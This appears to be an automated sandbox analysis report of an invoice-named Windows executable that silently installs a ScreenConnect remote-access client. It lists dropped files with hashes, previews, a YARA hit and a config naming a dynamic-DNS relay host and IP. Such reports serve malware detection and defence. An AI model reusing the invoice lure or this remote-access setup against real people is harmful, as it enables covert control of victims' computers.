                                                                                SHA1:9209D3CB6BDCB2157E2B7B47F990971C6DBB2D45
                                                                                SHA-256:3745E94A8A423C9CCF96C7D32C1DFE534778C9E0E4607D7855349F69F873CFAE
                                                                                SHA-512:531F43AC05AC31345D940579C21C5078D9EBA4F519B2F5B89BB1C181790D00E710EF9DDE4B23715E8EEF9D8F9118816042BC3D07141F09A78D04190636CBB119
                                                                                Malicious:false
                                                                                Preview:......................>.......................................................{...b...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):423938
                                                                                Entropy (8bit):6.577589753712197
                                                                                Encrypted:false
                                                                                SSDEEP:6144:puH2aCGw1ST1wQLdqv5uH2aCGw1ST1wQLdqvE4:puH2anwohwQUv5uH2anwohwQUv7
                                                                                MD5:9AAF385B3264D897B7A163FBA18D133B
                                                                                SHA1:D41A6CE5BB57BBB41CF0CD58FFE9680D0AB99EEB
                                                                                SHA-256:2C2F1322AD84FACDBCA6DF16A0B765BF2229CD74E8196BCEB92A9A9F835F36C3
                                                                                SHA-512:177DF8175FB1B1BEFE14E8F05CEE2518FF87C3AF3EB1E392EFE9AB7A17DDA4C21C77ECB3A512D753FD402543A7314F8B45A26D03AF2AA35068EE4224333177C3
                                                                                Malicious:false
                                                                                Yara Hits:
                                                                                • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Installer\MSI299C.tmp, Author: Joe Security
                                                                                Preview:...@IXOS.@.....@..BY.@.....@.....@.....@.....@.....@......&.{5432CC63-8BF4-F791-1B1A-15E2F80B3217}'.ScreenConnect Client (e6cb77284cf765aa)..setup.msi.@.....@.....@.....@......DefaultIcon..&.{5432CC63-8BF4-F791-1B1A-15E2F80B3217}.....@.....@.....@.....@.......@.....@.....@.......@....'.ScreenConnect Client (e6cb77284cf765aa)......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration.....@.....@.....@.]....&.{F7DC6ACE-2599-29C8-925C-5B3ACC994D1F}^.C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.dll.@.......@.....@.....@......&.{E75F3825-615D-A6C3-18A8-A81116BE1B2A}f.C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsBackstageShell.exe.@.......@.....@.....@......&.{1D30660B-8729-B08B-2523-3D6361F833F5}c.C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsFileManager.exe.@.......@.
                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):207360
                                                                                Entropy (8bit):6.573348437503042
                                                                                Encrypted:false
                                                                                SSDEEP:3072:X9LUHM7ptZ8UKOGw5vMWSuRy1YaDJkflQn3H+QDO/6Q+cxbr0qMG:XuH2aCGw1ST1wQLdqv
                                                                                MD5:BA84DD4E0C1408828CCC1DE09F585EDA
                                                                                SHA1:E8E10065D479F8F591B9885EA8487BC673301298
                                                                                SHA-256:3CFF4AC91288A0FF0C13278E73B282A64E83D089C5A61A45D483194AB336B852
                                                                                SHA-512:7A38418F6EE8DBC66FAB2CD5AD8E033E761912EFC465DAA484858D451DA4B8576079FE90FD3B6640410EDC8B3CAC31C57719898134F246F4000D60A252D88290
                                                                                Malicious:false
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........AF../.../.../.'D..../.'D..../.'D..../...,.../...+.../...*.../......./......./.....n./.*.*.../.*./.../.*...../....../.*.-.../.Rich../.........................PE..L...pG.Y...........!.........L......&.....................................................@.................................P........P..x....................`......P...T...............................@...............<............................text...+........................... ..`.rdata..*...........................@..@.data...."... ......................@....rsrc...x....P......................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................
                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):207360
                                                                                Entropy (8bit):6.573348437503042
                                                                                Encrypted:false
                                                                                SSDEEP:3072:X9LUHM7ptZ8UKOGw5vMWSuRy1YaDJkflQn3H+QDO/6Q+cxbr0qMG:XuH2aCGw1ST1wQLdqv
                                                                                MD5:BA84DD4E0C1408828CCC1DE09F585EDA
                                                                                SHA1:E8E10065D479F8F591B9885EA8487BC673301298
                                                                                SHA-256:3CFF4AC91288A0FF0C13278E73B282A64E83D089C5A61A45D483194AB336B852
                                                                                SHA-512:7A38418F6EE8DBC66FAB2CD5AD8E033E761912EFC465DAA484858D451DA4B8576079FE90FD3B6640410EDC8B3CAC31C57719898134F246F4000D60A252D88290
                                                                                Malicious:false
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........AF../.../.../.'D..../.'D..../.'D..../...,.../...+.../...*.../......./......./.....n./.*.*.../.*./.../.*...../....../.*.-.../.Rich../.........................PE..L...pG.Y...........!.........L......&.....................................................@.................................P........P..x....................`......P...T...............................@...............<............................text...+........................... ..`.rdata..*...........................@..@.data...."... ......................@....rsrc...x....P......................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................
                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                                                Category:dropped
                                                                                Size (bytes):20480
                                                                                Entropy (8bit):1.1621440859152345
                                                                                Encrypted:false
                                                                                SSDEEP:12:JSbX72FjdQAGiLIlHVRpMh/7777777777777777777777777vDHFRyp3Xl0i8Q:JYQI5cTo6F
                                                                                MD5:15F1AAD7341C512029C56A3AA8E3A7B1
                                                                                SHA1:0D6F7648CDB7608F56DC3CD16C550D428F446A87
                                                                                SHA-256:4404F784A2211E608C82D81256733CF16B1815A8EEF4381B0F6473326531823D
                                                                                SHA-512:B9CB9A1AB1899550B0F02798B0CA8A7B53E1DF1CEA38401EBD31DCC7F861013D264C991DE02812CD855A8C60F0EB357B103F2B62660EE178A86DEC2403024913
                                                                                Malicious:false
                                                                                Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                                                Category:dropped
                                                                                Size (bytes):20480
                                                                                Entropy (8bit):1.828664084643696
                                                                                Encrypted:false
                                                                                SSDEEP:48:MbV8Ph+uRc06WX4uFT5Gnt+WGqcq56AdujSiI2QdLDzV4xMygcuNoXSCUQ5rGAd/:1h+1eFTa+CpifBQdfqHgcNfbK6
                                                                                MD5:FC622973F92F9219FCC1B813D38392F4
                                                                                SHA1:A6A4A1C53C6E71EF309BED9F05905EBC9000A7ED
                                                                                SHA-256:672ECA3B81E5A4DE0A5C0BBC665AAB1DA8F0F026AAF8A586C363EB82968575ED
                                                                                SHA-512:928858129C1F55AE51A61877DAE350514D5413ED3102D2B4A5F4EEC1D6430CC2E86635F13409F2A1E83F36B1AA7D7DBCA4C07BE9873A2ABA189EB6386DBA9DA1
                                                                                Malicious:false
                                                                                Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                File Type:MS Windows icon resource - 3 icons, 16x16 with PNG image data, 16 x 16, 8-bit colormap, non-interlaced, 4 bits/pixel, 32x32 with PNG image data, 32 x 32, 1-bit colormap, non-interlaced, 4 bits/pixel
                                                                                Category:dropped
                                                                                Size (bytes):435
                                                                                Entropy (8bit):5.289734780210945
                                                                                Encrypted:false
                                                                                SSDEEP:12:Kvv/7tghWPjScQZ/Ev/739Jgh5TZYR/v/71XfghNeZ:QOZZq9JOz0dONeZ
                                                                                MD5:F34D51C3C14D1B4840AE9FF6B70B5D2F
                                                                                SHA1:C761D3EF26929F173CEB2F8E01C6748EE2249A8A
                                                                                SHA-256:0DD459D166F037BB8E531EB2ECEB2B79DE8DBBD7597B05A03C40B9E23E51357A
                                                                                SHA-512:D6EEB5345A5A049A87BFBFBBBEBFBD9FBAEC7014DA41DB1C706E8B16DDEC31561679AAE9E8A0847098807412BD1306B9616C8E6FCFED8683B4F33BD05ADE38D1
                                                                                Malicious:false
                                                                                Preview:..............z...6... ..............00..........0....PNG........IHDR.............(-.S....PLTE....22.u......tRNS.@..f..."IDATx.c` .0"...$.(......SC..Q8....9b.i.Xa.....IEND.B`..PNG........IHDR... ... .....I......PLTE....22.u......tRNS.@..f...(IDATx.c`...... ... D.......vb.....A`..(.-s...q....IEND.B`..PNG........IHDR...0...0.....m.k.....PLTE....22.u......tRNS.@..f...+IDATx.c` .......Q...S.@..DQu...4...(.}DQD...3x........IEND.B`.
                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):360001
                                                                                Entropy (8bit):5.362963686547544
                                                                                Encrypted:false
                                                                                SSDEEP:1536:6qELG7gK+RaOOp3LCCpfmLgYI66xgFF9Sq8K6MAS2OMUHl6Gin327D22A26Kgau9:zTtbmkExhMJCIpEk
                                                                                MD5:A9DF85515F56FDB4B2A3551573DFBDC0
                                                                                SHA1:64FA6DF753A8F3232D584145CD6E244F08B36B2D
                                                                                SHA-256:730175F99460508566205B9600C95AA88502089B349037C510B28322B189C1B1
                                                                                SHA-512:644F8275F2265E416E73A0D2CA551CB14958B4A17234EB26687C6E494E0EEADBE019F9356A52C70FB46F6A5159CABB573CDB35077CCAF88ED0380076A08B0EB2
                                                                                Malicious:false
                                                                                Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [
                                                                                Process:C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe
                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                Category:modified
                                                                                Size (bytes):559
                                                                                Entropy (8bit):5.0386056089679325
                                                                                Encrypted:false
                                                                                SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENO0Y81vn/vXbAa3xT:2dL9hK6E46YPt8pvH
                                                                                MD5:17A14C0FB18440BB92B647672246D75B
                                                                                SHA1:DF0C0E6605924F7E25DFD19EA4BB51CD9C4DB1BB
                                                                                SHA-256:0508E26C46A39957A1308B4DE110C2AC1DFD26938273AE977B9979D0F2E44701
                                                                                SHA-512:4AA0A7B15E198B8402F6752D06E2ADBCBB4C90FE6AD5B07A90079B01EF97FB3044FBB90AC3B01B3865C82E330881007F550D0536E143F8B0068D24BE6B60C045
                                                                                Malicious:false
                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>mmf351.ddns.net=79.110.49.16-02%2f10%2f2024%2004%3a13%3a12</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                                                Process:C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe
                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):559
                                                                                Entropy (8bit):5.0386056089679325
                                                                                Encrypted:false
                                                                                SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENO0Y81vn/vXbAa3xT:2dL9hK6E46YPt8pvH
                                                                                MD5:17A14C0FB18440BB92B647672246D75B
                                                                                SHA1:DF0C0E6605924F7E25DFD19EA4BB51CD9C4DB1BB
                                                                                SHA-256:0508E26C46A39957A1308B4DE110C2AC1DFD26938273AE977B9979D0F2E44701
                                                                                SHA-512:4AA0A7B15E198B8402F6752D06E2ADBCBB4C90FE6AD5B07A90079B01EF97FB3044FBB90AC3B01B3865C82E330881007F550D0536E143F8B0068D24BE6B60C045
                                                                                Malicious:false
                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>mmf351.ddns.net=79.110.49.16-02%2f10%2f2024%2004%3a13%3a12</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                                                Process:C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe
                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):1590
                                                                                Entropy (8bit):5.363907225770245
                                                                                Encrypted:false
                                                                                SSDEEP:48:MxHKQ71qHGIs0HKEHiYHKGSI6oPtHTHhAHKKkhHNpv:iq+wmj0qECYqGSI6oPtzHeqKkhtpv
                                                                                MD5:E88F0E3AD82AC5F6557398EBC137B0DE
                                                                                SHA1:20D4BBBE8E219D2D2A0E01DA1F7AD769C3AC84DA
                                                                                SHA-256:278AA1D32C89FC4CD991CA18B6E70D3904C57E50192FA6D882959EB16F14E380
                                                                                SHA-512:CA6A7AAE873BB300AC17ADE2394232E8C782621E30CA23EBCE8FE65EF2E5905005EFD2840FD9310FBB20D9E9848961FAE2873B3879FCBC58F8A6074337D5802D
                                                                                Malicious:false
                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..2,"System.Deployment, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture
                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):69632
                                                                                Entropy (8bit):0.246390964422784
                                                                                Encrypted:false
                                                                                SSDEEP:48:4uDBAdujS3qcq56AdujSiI2QdLDzV4xMygcuNoXSCUQ5r1WCqn:4CxpifBQdfqHgcNfbH7
                                                                                MD5:22C9DCB75755F1D42C0A5FC66D5721CD
                                                                                SHA1:79D98998C49FFCE47D3FF4B3B2F220B851E95903
                                                                                SHA-256:AF56A65C78A0571C31E8DCE1EED5561D81E05768D0500E5D69A20BC1F5A243E0
                                                                                SHA-512:4DE36032037A5FD7989BED5E49D36E15931C1D33A673E72F588D1CD78BD8DF91C726A0626AEDA1B416D14FA5076DB2A9CB6E686157733D2D36601A8B77344D2E
                                                                                Malicious:false
                                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                                                Category:dropped
                                                                                Size (bytes):32768
                                                                                Entropy (8bit):1.4418091624012472
                                                                                Encrypted:false
                                                                                SSDEEP:48:WLWu4O+xFX4vT5hURnt+WGqcq56AdujSiI2QdLDzV4xMygcuNoXSCUQ5rGAdujSB:UWdsTXy+CpifBQdfqHgcNfbK6
                                                                                MD5:F9F23656D4E8220C02EE8FDA089C282D
                                                                                SHA1:F4C26544DE59513FA0FD85ECCC9F37D5BC605A4B
                                                                                SHA-256:15F92C8AC9B7369345B69C17A35282E0239CAE33D012708F9A6228E03783C4D1
                                                                                SHA-512:09235AF2AB168821E7E9741A9EE7CD8CA5F30C77419D5E09B809270480E835F1378E6B4645DBB9B78F567859EB59FD6EB943617C7329DB35010EA1EBAC1677B6
                                                                                Malicious:false
                                                                                Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):512
                                                                                Entropy (8bit):0.0
                                                                                Encrypted:false
                                                                                SSDEEP:3::
                                                                                MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                Malicious:false
                                                                                Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                                                Category:dropped
                                                                                Size (bytes):20480
                                                                                Entropy (8bit):1.828664084643696
                                                                                Encrypted:false
                                                                                SSDEEP:48:MbV8Ph+uRc06WX4uFT5Gnt+WGqcq56AdujSiI2QdLDzV4xMygcuNoXSCUQ5rGAd/:1h+1eFTa+CpifBQdfqHgcNfbK6
                                                                                MD5:FC622973F92F9219FCC1B813D38392F4
                                                                                SHA1:A6A4A1C53C6E71EF309BED9F05905EBC9000A7ED
                                                                                SHA-256:672ECA3B81E5A4DE0A5C0BBC665AAB1DA8F0F026AAF8A586C363EB82968575ED
                                                                                SHA-512:928858129C1F55AE51A61877DAE350514D5413ED3102D2B4A5F4EEC1D6430CC2E86635F13409F2A1E83F36B1AA7D7DBCA4C07BE9873A2ABA189EB6386DBA9DA1
                                                                                Malicious:false
                                                                                Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):512
                                                                                Entropy (8bit):0.0
                                                                                Encrypted:false
                                                                                SSDEEP:3::
                                                                                MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                Malicious:false
                                                                                Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                                                Category:dropped
                                                                                Size (bytes):32768
                                                                                Entropy (8bit):1.4418091624012472
                                                                                Encrypted:false
                                                                                SSDEEP:48:WLWu4O+xFX4vT5hURnt+WGqcq56AdujSiI2QdLDzV4xMygcuNoXSCUQ5rGAdujSB:UWdsTXy+CpifBQdfqHgcNfbK6
                                                                                MD5:F9F23656D4E8220C02EE8FDA089C282D
                                                                                SHA1:F4C26544DE59513FA0FD85ECCC9F37D5BC605A4B
                                                                                SHA-256:15F92C8AC9B7369345B69C17A35282E0239CAE33D012708F9A6228E03783C4D1
                                                                                SHA-512:09235AF2AB168821E7E9741A9EE7CD8CA5F30C77419D5E09B809270480E835F1378E6B4645DBB9B78F567859EB59FD6EB943617C7329DB35010EA1EBAC1677B6
                                                                                Malicious:false
                                                                                Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):512
                                                                                Entropy (8bit):0.0
                                                                                Encrypted:false
                                                                                SSDEEP:3::
                                                                                MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                Malicious:false
                                                                                Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):512
                                                                                Entropy (8bit):0.0
                                                                                Encrypted:false
                                                                                SSDEEP:3::
                                                                                MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                Malicious:false
                                                                                Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):32768
                                                                                Entropy (8bit):0.06903549471626184
                                                                                Encrypted:false
                                                                                SSDEEP:6:2/9LG7iVCnLG7iVrKOzPLHKOztxnyVky6l3X:2F0i8n0itFzDHFRn3X
                                                                                MD5:9314BA8F8A7266B343220FC28462579C
                                                                                SHA1:0EB0197A28B104DC74231E66D366F04EF01EAC21
                                                                                SHA-256:41E381B4E8E306F350AB5C1E6480C3B559ABFDB3A893A44E15EA9DFCC10F2CBB
                                                                                SHA-512:0F027693E8A187763FEF2B2A9734B2569D1A3FB918A50A7B56E5E5B0F58A19A6B699840E26BA261EC4D5188EE06DE7A93B19E6F82326627C194CA794C81636CC
                                                                                Malicious:false
                                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                                                Category:dropped
                                                                                Size (bytes):32768
                                                                                Entropy (8bit):1.4418091624012472
                                                                                Encrypted:false
                                                                                SSDEEP:48:WLWu4O+xFX4vT5hURnt+WGqcq56AdujSiI2QdLDzV4xMygcuNoXSCUQ5rGAdujSB:UWdsTXy+CpifBQdfqHgcNfbK6
                                                                                MD5:F9F23656D4E8220C02EE8FDA089C282D
                                                                                SHA1:F4C26544DE59513FA0FD85ECCC9F37D5BC605A4B
                                                                                SHA-256:15F92C8AC9B7369345B69C17A35282E0239CAE33D012708F9A6228E03783C4D1
                                                                                SHA-512:09235AF2AB168821E7E9741A9EE7CD8CA5F30C77419D5E09B809270480E835F1378E6B4645DBB9B78F567859EB59FD6EB943617C7329DB35010EA1EBAC1677B6
                                                                                Malicious:false
                                                                                Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                                                Category:dropped
                                                                                Size (bytes):20480
                                                                                Entropy (8bit):1.828664084643696
                                                                                Encrypted:false
                                                                                SSDEEP:48:MbV8Ph+uRc06WX4uFT5Gnt+WGqcq56AdujSiI2QdLDzV4xMygcuNoXSCUQ5rGAd/:1h+1eFTa+CpifBQdfqHgcNfbK6
                                                                                MD5:FC622973F92F9219FCC1B813D38392F4
                                                                                SHA1:A6A4A1C53C6E71EF309BED9F05905EBC9000A7ED
                                                                                SHA-256:672ECA3B81E5A4DE0A5C0BBC665AAB1DA8F0F026AAF8A586C363EB82968575ED
                                                                                SHA-512:928858129C1F55AE51A61877DAE350514D5413ED3102D2B4A5F4EEC1D6430CC2E86635F13409F2A1E83F36B1AA7D7DBCA4C07BE9873A2ABA189EB6386DBA9DA1
                                                                                Malicious:false
                                                                                Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):512
                                                                                Entropy (8bit):0.0
                                                                                Encrypted:false
                                                                                SSDEEP:3::
                                                                                MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                Malicious:false
                                                                                Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                Entropy (8bit):7.426010914436592
                                                                                TrID:
                                                                                • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                • DOS Executable Generic (2002/1) 0.01%
                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                File name:invoice-benefits-agency9-24-2024.exe
                                                                                File size:5'622'904 bytes
                                                                                MD5:00cd8ce405a29bad77e5caec894b44a0
                                                                                SHA1:016154e4ea41864e8c4b689c9f7ac7cceda5c7db
                                                                                SHA256:ec0f1ec3f107b3559c97f1db4f9a1ae04481f2893c20b2e071f855309d7cc8ed
                                                                                SHA512:4ef1752e7c5b85bc138cd50889dd5823acb269363b6bba0a4a8ad176e881d24713603c1088aac01fc29a2e570854ad9d306c1beaf7ac983e5531654715f8d709
                                                                                SSDEEP:49152:FDex5xKkEJkGYYpT0+TFiH7efP0x58IJL+md3rHgDNMKLo8SsxG/XcW32gqkAfoO:z4s6efPQ53JLbd3LINMLaGUW39f0
                                                                                TLSH:C746E111B3D995B9D0BF063CD87A52699A74BC048722C7AF57D4BD292D32BC04E323B6
                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........_..E>`.E>`.E>`.....O>`.....?>`.....]>`..Ee.`>`..Ed.T>`..Ec.Q>`.LF..A>`.[l..F>`.E>a.%>`..Ei.D>`..E..D>`..Eb.D>`.RichE>`........
                                                                                Icon Hash:90cececece8e8eb0
                                                                                Entrypoint:0x4014ad
                                                                                Entrypoint Section:.text
                                                                                Digitally signed:true
                                                                                Imagebase:0x400000
                                                                                Subsystem:windows gui
                                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                Time Stamp:0x6377E6AC [Fri Nov 18 20:10:20 2022 UTC]
                                                                                TLS Callbacks:
                                                                                CLR (.Net) Version:
                                                                                OS Version Major:5
                                                                                OS Version Minor:1
                                                                                File Version Major:5
                                                                                File Version Minor:1
                                                                                Subsystem Version Major:5
                                                                                Subsystem Version Minor:1
